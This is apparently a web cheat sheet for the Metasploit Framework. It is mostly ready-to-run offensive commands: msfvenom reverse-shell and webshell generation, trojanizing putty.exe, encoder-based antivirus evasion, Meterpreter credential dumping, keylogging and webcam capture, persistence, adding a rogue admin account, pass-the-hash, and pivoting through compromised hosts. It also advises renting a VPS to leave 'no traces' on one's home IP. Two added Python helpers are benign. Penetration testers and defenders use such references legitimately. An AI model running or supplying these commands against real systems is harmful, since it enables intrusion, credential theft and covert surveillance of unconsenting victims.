Metasploit is the exploitation framework everyone knows and half the people actually understand. This cheat sheet covers everything from first-time msfconsole navigation to post-exploitation pivoting — organized by how you actually use it on an engagement, not alphabetically by command.
Updated for 2026. Bookmark it.
Starting Metasploit
# Start msfconsole
msfconsole
# Start with quiet mode (skip banner)
msfconsole -q
# Start with a resource script
msfconsole -r setup.rc
# Start with a specific database
msfconsole -y /path/to/database.yml
# Update Metasploit
msfupdate
Database Setup
Metasploit’s database stores hosts, services, credentials, and loot. Worth setting up.
# Start PostgreSQL
sudo service postgresql start
# or
sudo systemctl start postgresql
# Initialize the database
msfdb init
# Check DB status
msf> db_status
# Connect to an existing DB (user:password@host/dbname; placeholders shown, the
# real credentials live in database.yml)
msf> db_connect postgres:<password>@<host>/msf
# Disconnect
msf> db_disconnect
# Rebuild the module cache (older releases only; Metasploit 5+ maintains the
# cache in the database automatically)
msf> db_rebuild_cache
Core msfconsole Commands
Navigation
# Help
msf> help
msf> ?
# Search modules
msf> search type:exploit name:eternalblue
msf> search cve:2021-44228
msf> search platform:windows type:exploit rank:excellent
msf> search ms17-010
# Use a module
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use 0 # use by search result number
# Show module info
msf> info
msf> info exploit/windows/smb/ms17_010_eternalblue
# Go back
msf> back
# Previous module
msf> previous
# Show all loaded modules
msf> show exploits
msf> show auxiliary
msf> show post
msf> show payloads
msf> show encoders
msf> show nops
msf> show evasion
Options
# Show options for current module
msf> show options
msf> show advanced # advanced options
msf> show missing # required options not yet set
# Set options
msf> set RHOSTS 192.168.1.1
msf> set RPORT 445
msf> set LHOST 192.168.1.100
msf> set LPORT 4444
# Set multiple targets
msf> set RHOSTS 192.168.1.1-254
msf> set RHOSTS 192.168.1.0/24
msf> set RHOSTS file:/tmp/targets.txt
# Unset an option
msf> unset RHOSTS
# Set global options (persist across modules)
msf> setg LHOST 192.168.1.100
msf> setg LPORT 4444
# Unset global option
msf> unsetg LHOST
# Save settings to file
msf> save
Targets and Payloads
# Show compatible targets
msf> show targets
msf> set TARGET 1
# Show compatible payloads for current exploit
msf> show payloads
# Set payload
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf> set PAYLOAD generic/shell_reverse_tcp
# Check if module/target/payload combo is viable
msf> check
Running Modules
# Run/exploit
msf> run
msf> exploit
# Run as a background job (prompt returns immediately)
msf> run -j
msf> exploit -j
# Don't drop into the session automatically when it opens
msf> exploit -z
# Background job plus no auto-interaction (the usual handler combination)
msf> exploit -j -z
Payloads
Payload Types
| Type | Description |
|---|---|
| singles | Self-contained, no stager needed |
| stagers | Small payload that fetches the stage |
| stages | The full payload delivered by a stager |
| meterpreter | Advanced in-memory shell, extensible |
| shell | Basic command shell |
Common Payload Names
# Windows reverse shells
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter_reverse_tcp # stageless
windows/x64/shell_reverse_tcp
windows/x64/powershell_reverse_tcp
# Windows bind shells
windows/x64/meterpreter/bind_tcp
# Linux reverse shells
linux/x64/meterpreter/reverse_tcp
linux/x64/meterpreter_reverse_tcp # stageless
linux/x64/shell_reverse_tcp
# macOS
osx/x64/meterpreter_reverse_tcp
osx/x64/shell_reverse_tcp
# Web payloads
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp
python/meterpreter/reverse_tcp
Staged vs Stageless: Staged (meterpreter/reverse_tcp) uses a small first stage to pull the full payload. Stageless (meterpreter_reverse_tcp) ships everything in one. Use stageless when you can't make a second outbound connection (locked-down networks). Use staged when file size matters.
msfvenom — Payload Generation
msfvenom generates standalone payloads outside of msfconsole.
Basic Usage
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> -o <output>
Common Formats
# Windows executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
# Windows DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o payload.dll
# PowerShell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh -o payload.ps1
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o payload.elf
# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py
# PHP webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php
# ASP/ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f asp -o shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx -o shell.aspx
# Java WAR
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o shell.war
# HTA (HTML Application)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f hta-psh -o payload.hta
# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.100 LPORT=4444 -f raw > shell.sh
Encoding and Evasion
# List encoders
msfvenom --list encoders
# Encode with shikata_ga_nai (x86 only)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
# Stageless with encoding
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x64/xor_dynamic -i 3 -f exe -o stageless.exe
# Add NOP sled
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -n 100 -f exe -o payload_nop.exe
# Bad character avoidance
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -b "\x00\x0a\x0d" -f exe -o nobadchars.exe
# Inject into existing executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -f exe -o trojanized.exe
# Keep original functionality
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -k -f exe -o trojanized_working.exe
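A check for the `-b` option above, written as an added example (not part of msfvenom or this page): it parses the same `"\x00\x0a\x0d"` spec msfvenom accepts and reports every offset in a raw output file that still carries a forbidden byte. The sample blobs are constructed, not real payloads, and the check only makes sense for `-f raw` output, since wrapper formats such as `-f exe` embed a PE template whose headers contain 0x00 no matter what `-b` was given.

```python
"""Verify that raw msfvenom output is free of the bytes listed with -b.

Added example, not msfvenom's own code. Spec format mirrors msfvenom's
-b argument ("\\x00\\x0a\\x0d"); sample blobs below are constructed.
"""
import re
import sys
from pathlib import Path

# One msfvenom-style escape: backslash, 'x', two hex digits.
_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_badchars(spec: str) -> bytes:
    """Turn a bad-character string such as '\\x00\\x0a\\x0d' into bytes."""
    hexes = _HEX_ESCAPE.findall(spec)
    # Every character of the spec must belong to a 4-character escape.
    if not hexes or len(hexes) * 4 != len(spec):
        raise ValueError(f"unrecognised bad-character spec: {spec!r}")
    return bytes(int(h, 16) for h in hexes)


def find_badchars(blob: bytes, badchars: bytes) -> list[tuple[int, int]]:
    """Return (offset, byte) for every occurrence of a forbidden byte."""
    forbidden = set(badchars)
    return [(off, b) for off, b in enumerate(blob) if b in forbidden]


def check_file(path: str, spec: str) -> bool:
    """True when the file at path contains none of the bytes in spec.

    Use on -f raw output only: -f exe and similar wrap the shellcode in a
    PE template whose headers contain NUL bytes regardless of -b.
    """
    return not find_badchars(Path(path).read_bytes(), parse_badchars(spec))


# Constructed samples: one clean blob, one containing NUL, CR and LF.
CLEAN_SAMPLE = bytes(range(0x10, 0x20))
DIRTY_SAMPLE = b"\x90\x90\x00\x41\x0d\x0a"

if __name__ == "__main__":
    # usage: python badchar_check.py payload.bin '\x00\x0a\x0d'
    hits = find_badchars(Path(sys.argv[1]).read_bytes(),
                         parse_badchars(sys.argv[2]))
    for off, b in hits:
        print(f"bad byte 0x{b:02x} at offset {off}")
    sys.exit(1 if hits else 0)
```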
Listing Options
# List all payloads
msfvenom --list payloads
# List payloads for a specific platform
msfvenom --list payloads | grep windows/x64
# List output formats
msfvenom --list formats
# Payload options
msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options
Listeners — Catching Shells
Multi/Handler (Recommended)
msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> set LPORT 4444
msf> set ExitOnSession false # keep listening after first session
msf> run -j # run as background job
Resource Script for Handler
Save as handler.rc and load with msfconsole -r handler.rc:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run -j
Sessions
Managing Sessions
# List active sessions
msf> sessions
msf> sessions -l
# Interact with a session
msf> sessions -i 1
# Kill a session
msf> sessions -k 1
msf> sessions -k all
# Run a command on a session without interacting
msf> sessions -c "whoami" -i 1
# Run a module on a session
msf> sessions -s post/multi/manage/shell_to_meterpreter -i 1
# Upgrade a shell to Meterpreter
msf> sessions -u 1
# Background current session
meterpreter> background
# or
meterpreter> bg
Session Types
# Shell session to Meterpreter
msf> use post/multi/manage/shell_to_meterpreter
msf> set SESSION 1
msf> run
Meterpreter Commands
Core
# Help
meterpreter> help
meterpreter> ?
# Background session
meterpreter> background
meterpreter> bg
# Get current session info
meterpreter> sysinfo
# Current user
meterpreter> getuid
# Get PID
meterpreter> getpid
# Get environment variables
meterpreter> getenv PATH
# Exit/kill session
meterpreter> exit
meterpreter> quit
File System
# Print working directory
meterpreter> pwd
# List directory
meterpreter> ls
meterpreter> dir
# Change directory
meterpreter> cd C:\\Users\\target
# Read file
meterpreter> cat C:\\Users\\target\\Desktop\\secret.txt
# Upload file
meterpreter> upload /local/file.exe C:\\Windows\\Temp\\file.exe
# Download file
meterpreter> download C:\\Users\\target\\Desktop\\secret.txt /local/
# Delete file
meterpreter> rm C:\\Windows\\Temp\\file.exe
# Make directory
meterpreter> mkdir C:\\Windows\\Temp\\working
# Search for files
meterpreter> search -f *.txt -d C:\\Users
meterpreter> search -f password* -d C:\\
meterpreter> search -f *.kdbx
Process Management
# List processes
meterpreter> ps
# Kill process
meterpreter> kill 1234
# Migrate to another process
meterpreter> migrate 1234
# Migrate to explorer.exe (for stability)
meterpreter> migrate -N explorer.exe
# Execute a program
meterpreter> execute -f cmd.exe -i -H # interactive, hidden
meterpreter> execute -f notepad.exe
# Get shell
meterpreter> shell
Privilege Escalation
# Check privileges
meterpreter> getprivs
# Get system (requires admin)
meterpreter> getsystem
# Show token impersonation options
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token "NT AUTHORITY\\SYSTEM"
# UAC bypass (from msfconsole)
msf> use exploit/windows/local/bypassuac
msf> set SESSION 1
msf> run
Networking
# Network interfaces
meterpreter> ipconfig
meterpreter> ifconfig
# ARP table
meterpreter> arp
# Active connections
meterpreter> netstat
# DNS resolve
meterpreter> resolve google.com
# Port forward: listen on local port -l, send traffic through the session to host -r, port -p
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.1
meterpreter> portfwd list
meterpreter> portfwd delete -l 3389
# Route through session (add subnet to routing table)
msf> route add 192.168.2.0/24 1 # 1 = session ID
msf> route print
msf> route remove 192.168.2.0/24 1
Credential Dumping
# Dump hashes (requires SYSTEM)
meterpreter> hashdump
# Run Mimikatz (kiwi module)
meterpreter> load kiwi
meterpreter> creds_all # dump all credentials
meterpreter> lsa_dump_sam # SAM database
meterpreter> lsa_dump_secrets # LSA secrets
meterpreter> lsa_dump_cache # cached domain credentials
meterpreter> kerberos_ticket_list # list Kerberos tickets
meterpreter> kerberos_ticket_purge
meterpreter> golden_ticket_create # create golden ticket
meterpreter> wifi_list # saved WiFi passwords
# Via post module
msf> use post/windows/gather/hashdump
msf> set SESSION 1
msf> run
Screenshots and Keylogging
# Screenshot
meterpreter> screenshot
# Start keylogger
meterpreter> keyscan_start
# Dump keylogger buffer
meterpreter> keyscan_dump
# Stop keylogger
meterpreter> keyscan_stop
# Webcam snapshot
meterpreter> webcam_snap
# Webcam stream
meterpreter> webcam_stream
# Audio capture
meterpreter> record_mic -d 10 # 10 seconds
Persistence
# Registry autorun
msf> use post/windows/manage/persistence
msf> set SESSION 1
msf> set STARTUP REGISTRY
msf> run
# Scheduler task
msf> use post/windows/manage/persistence_exe
msf> set SESSION 1
msf> set STARTUP SCHEDULER
msf> run
# Via meterpreter (older method)
meterpreter> run persistence -h # see options
Post-Exploitation Modules
Windows
# Local privilege escalation suggestions
msf> use post/multi/recon/local_exploit_suggester
msf> set SESSION 1
msf> run
# Dump credentials
msf> use post/windows/gather/credentials/credential_collector
msf> use post/windows/gather/smart_hashdump
# Enumerate applications
msf> use post/windows/gather/enum_applications
msf> set SESSION 1
msf> run
# Enumerate logged-on users
msf> use post/windows/gather/enum_logged_on_users
# Collect browser data
msf> use post/windows/gather/enum_chrome
msf> use post/windows/gather/enum_firefox
# Windows Defender status
msf> use post/windows/gather/av_bypass
# Enable RDP
msf> use post/windows/manage/enable_rdp
msf> set SESSION 1
msf> run
# Add admin user
msf> use post/windows/manage/add_user
msf> set SESSION 1
msf> set USERNAME hacker
msf> set PASSWORD Password123
msf> set GROUP Administrators
msf> run
Linux
# Local privilege escalation suggestions
msf> use post/multi/recon/local_exploit_suggester
# Dump hashes
msf> use post/linux/gather/hashdump
msf> use post/linux/gather/pptpd_chap_secrets
# Enum configs
msf> use post/linux/gather/enum_configs
# SSH key persistence
msf> use post/linux/manage/sshkey_persistence
Cross-Platform
# TCP/UDP scan through session (pivot recon)
msf> use post/multi/gather/ping_sweep
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.2.0/24
msf> set SESSION 1
msf> run
Pivoting
Use this when you’ve compromised a box that can reach networks you can’t access directly.
Route-Based Pivoting
# Add route through session
msf> route add 192.168.2.0/24 1 # session 1
msf> route print
# Now modules targeting 192.168.2.x will pivot through session 1
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run
# Auto-add routes from session
msf> use post/multi/manage/autoroute
msf> set SESSION 1
msf> set ACTION ADD
msf> run
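The route table above is easier to reason about as code. This added example (a model written for this page, not Metasploit's own switchboard code) reproduces the behaviour described: traffic for a routed subnet is carried by the listed session, anything unrouted goes out directly, and when routes overlap the most specific prefix wins. From the defender's side it also shows why pivoted scans appear to come from the compromised host itself: every routed connection originates there.

```python
"""Model of msfconsole's `route` table (added example, not Metasploit code).

Mirrors the cheat-sheet semantics: `route add <subnet> <session>` sends a
module's traffic for that subnet through the session; hosts matching no
route are contacted directly; overlapping routes resolve to the longest prefix.
"""
import ipaddress
from typing import Optional


class PivotRoutes:
    def __init__(self) -> None:
        # (network, session id) pairs in insertion order, like `route print`.
        self._routes: list[tuple[ipaddress.IPv4Network, int]] = []

    def add(self, subnet: str, session: int) -> None:
        """Equivalent of `route add 192.168.2.0/24 1`."""
        net = ipaddress.ip_network(subnet, strict=False)
        self._routes.append((net, session))

    def remove(self, subnet: str, session: int) -> bool:
        """Equivalent of `route remove <subnet> <session>`; True if a route was dropped."""
        net = ipaddress.ip_network(subnet, strict=False)
        before = len(self._routes)
        self._routes = [r for r in self._routes if r != (net, session)]
        return len(self._routes) != before

    def lookup(self, host: str) -> Optional[int]:
        """Session that carries traffic to host, or None for a direct connection.

        Among matching routes the longest prefix wins; if two identical
        networks point at different sessions, the higher session id is used.
        """
        addr = ipaddress.ip_address(host)
        matches = [(net.prefixlen, sid) for net, sid in self._routes if addr in net]
        return max(matches)[1] if matches else None

    def print_table(self) -> str:
        """Table in the spirit of `route print` (column layout is this model's)."""
        lines = ["Subnet            Netmask          Gateway"]
        for net, sid in self._routes:
            lines.append(f"{str(net.network_address):<17} {str(net.netmask):<16} Session {sid}")
        return "\n".join(lines)


if __name__ == "__main__":
    # Scenario from the cheat sheet: session 1 sits on 192.168.1.x and
    # reaches 192.168.2.x; everything else still leaves the attack box directly.
    routes = PivotRoutes()
    routes.add("192.168.2.0/24", 1)
    print(routes.print_table())
    for target in ("192.168.2.20", "192.168.1.10"):
        via = routes.lookup(target)
        print(f"{target}: {'via session ' + str(via) if via else 'direct'}")
```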
SOCKS Proxy (for external tools)
# Start SOCKS proxy through session
msf> use auxiliary/server/socks_proxy
msf> set VERSION 5
msf> set SRVHOST 127.0.0.1
msf> set SRVPORT 1080
msf> run -j
# Then use proxychains for external tools
# Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 192.168.2.1
proxychains crackmapexec smb 192.168.2.0/24
Port Forwarding
# Forward local port to remote host:port via session
meterpreter> portfwd add -l 8080 -p 80 -r 192.168.2.10
# Reverse forward: the target listens on port -p and relays connections back to -L:-l on your side
meterpreter> portfwd add -R -p 4444 -l 4444 -L 192.168.1.100
# Access internal RDP through pivot
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.10
# Now: xfreerdp /v:127.0.0.1:3389 /u:administrator
Auxiliary Modules
Scanners, brute forcers, fuzzers — no exploitation, just recon and testing.
Scanning
# Port scan
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.1.0/24
msf> set PORTS 22,80,443,445,3389
msf> run
# SYN scan
msf> use auxiliary/scanner/portscan/syn
# SMB version
msf> use auxiliary/scanner/smb/smb_version
msf> set RHOSTS 192.168.1.0/24
msf> run
# EternalBlue check (no exploitation)
msf> use auxiliary/scanner/smb/smb_ms17_010
# SSH version
msf> use auxiliary/scanner/ssh/ssh_version
# FTP version
msf> use auxiliary/scanner/ftp/ftp_version
# HTTP title
msf> use auxiliary/scanner/http/title
# VNC auth check
msf> use auxiliary/scanner/vnc/vnc_none_auth
Brute Force
# SSH brute force
msf> use auxiliary/scanner/ssh/ssh_login
msf> set RHOSTS 192.168.1.1
msf> set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> set STOP_ON_SUCCESS true
msf> run
# SMB brute force
msf> use auxiliary/scanner/smb/smb_login
msf> set RHOSTS 192.168.1.0/24
msf> set SMBUser administrator
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> run
# FTP brute force
msf> use auxiliary/scanner/ftp/ftp_login
# HTTP form brute force
msf> use auxiliary/scanner/http/http_login
Exploitation
# EternalBlue (MS17-010)
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.1
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run
# BlueKeep (CVE-2019-0708)
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# Log4Shell (CVE-2021-44228)
msf> use exploit/multi/http/log4shell_header_injection
# PrintNightmare (CVE-2021-1675)
msf> use exploit/windows/local/cve_2021_1675_printnightmare
# Zerologon (CVE-2020-1472)
msf> use exploit/windows/dcerpc/cve_2020_1472_zerologon
# MS08-067 (legacy, but lab staple)
msf> use exploit/windows/smb/ms08_067_netapi
Database Commands
# Show discovered hosts
msf> hosts
msf> hosts -R # set RHOSTS to all discovered hosts
# Show discovered services
msf> services
msf> services -p 445 # filter by port
msf> services -S smb # filter by service name
# Show credentials
msf> creds
# Show loot
msf> loot
# Import Nmap XML
msf> db_import /path/to/scan.xml
# Run Nmap and import directly
msf> db_nmap -sV -p- 192.168.1.1
# Export database
msf> db_export -f xml /tmp/msf_export.xml
# Workspace management
msf> workspace # list workspaces
msf> workspace -a engagement1 # create workspace
msf> workspace engagement1 # switch workspace
msf> workspace -d engagement1 # delete workspace
Resource Scripts
Automate repetitive setup with .rc files.
# Run on start
msfconsole -r /path/to/script.rc
# Run from within msfconsole
msf> resource /path/to/script.rc
# Record commands to a script
msf> spool /tmp/session.rc # start recording
msf> spool off # stop recording
Example auto_handler.rc:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j -z
Jobs
# List background jobs
msf> jobs
msf> jobs -l
# Kill a job
msf> jobs -k 0
# Kill all jobs
msf> jobs -K
Useful Combinations
Initial Compromise → Lateral Movement
# 1. Exploit entry point
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.10
msf> exploit -j
# 2. Add pivot route
msf> route add 192.168.2.0/24 1
# 3. Scan internal network through pivot
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run
# 4. Exploit internal targets through pivot
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.2.20
msf> exploit -j
Quick Domain Compromise (if you have admin hash)
# Pass-the-hash with PSExec
msf> use exploit/windows/smb/psexec
msf> set RHOSTS 192.168.1.1
msf> set SMBUser administrator
msf> set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run
Persistence + Cleanup Awareness
# Always document what you plant
meterpreter> run post/windows/manage/persistence SESSION=1
# List persistence items (manual check)
msf> use post/windows/gather/enum_services
# Cleanup before leaving (on authorized engagements)
msf> use post/windows/manage/persistence_exe
msf> set ACTION REMOVE
Quick Reference Card
| Task | Command |
|---|---|
| Start msfconsole | msfconsole -q |
| Search modules | search type:exploit ms17-010 |
| Use module | use exploit/windows/smb/ms17_010_eternalblue |
| Show options | show options |
| Set target | set RHOSTS 192.168.1.1 |
| Set payload | set PAYLOAD windows/x64/meterpreter/reverse_tcp |
| Run exploit | run or exploit |
| Background session | background or bg |
| List sessions | sessions -l |
| Interact with session | sessions -i 1 |
| Get SYSTEM | getsystem |
| Dump hashes | hashdump (or load kiwi; creds_all) |
| Upload file | upload /local/file C:\\remote\\path |
| Download file | download C:\\remote\\path /local/ |
| Pivot routing | route add 192.168.2.0/24 1 |
| Port forward | portfwd add -l 3389 -p 3389 -r 192.168.2.1 |
| Generate payload | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x LPORT=4444 -f exe -o p.exe |
| Import Nmap scan | db_import scan.xml |
Metasploit vs. Other Tools
Metasploit doesn’t replace everything — know when to use something else.
| Task | Metasploit | Alternative |
|---|---|---|
| Exploitation | ✅ Strong module library | Manual exploit code, CrackMapExec |
| Post-exploitation | ✅ Meterpreter | Cobalt Strike, Havoc, Sliver |
| Payload generation | ✅ msfvenom | Sliver, Nimpackt, custom |
| AV Evasion | ⚠️ Limited (signatures known) | Veil, Shellter, manual obfuscation |
| C2 / Long-haul ops | ⚠️ Not built for stealth | Cobalt Strike, Brute Ratel, Mythic |
| Network scanning | ⚠️ Slower than Nmap | Nmap, Masscan, Rustscan |
| Password attacks | ✅ Good brute force | Hydra, Medusa, Hashcat |
For lab work and certification prep, Metasploit is the standard. For real red team ops, it’s a starting point — most serious operators use custom C2s for stealth.
Practice Environment
Metasploit without a target is useless. Get one:
- TryHackMe — beginner-friendly rooms, many built around Metasploit workflows
- Hack The Box — more realistic, plenty of MSF-compatible machines in Starting Point
- Your own lab — spin up a Windows VM or a vulnerable appliance (Metasploitable, DVWA) and fire away
For remote practice without VPN overhead, a $5-6 VPS on Vultr or DigitalOcean gives you a clean attack box with low latency. Spin it up, test, destroy it. No traces on your home IP, no VPN slowdowns.
What’s New in Metasploit 2026
- Framework 6.4+ ships with improved evasion for Meterpreter HTTPS transport — certificate pinning and JA3 randomization
- New modules covering cloud-native attack surfaces: AWS metadata service abuse, Azure IMDS exploitation
- sessions -u session upgrade is more reliable across Windows 11 + Server 2022 targets
- load kiwi updated to match Mimikatz 2.2.0 API changes — creds_all more stable on patched domain controllers
- SOCKS5 proxy module now supports authentication, closing a gap that made pivoting detectable in some environments
Metasploit is the closest thing to a Swiss Army knife in offensive security. It won’t win every engagement alone — but knowing it cold means you move faster when it matters.
This guide is updated regularly. Bookmark it.
RedTeamGuide.com is reader-supported. Some links above are affiliate links — we may earn a commission at no extra cost to you.
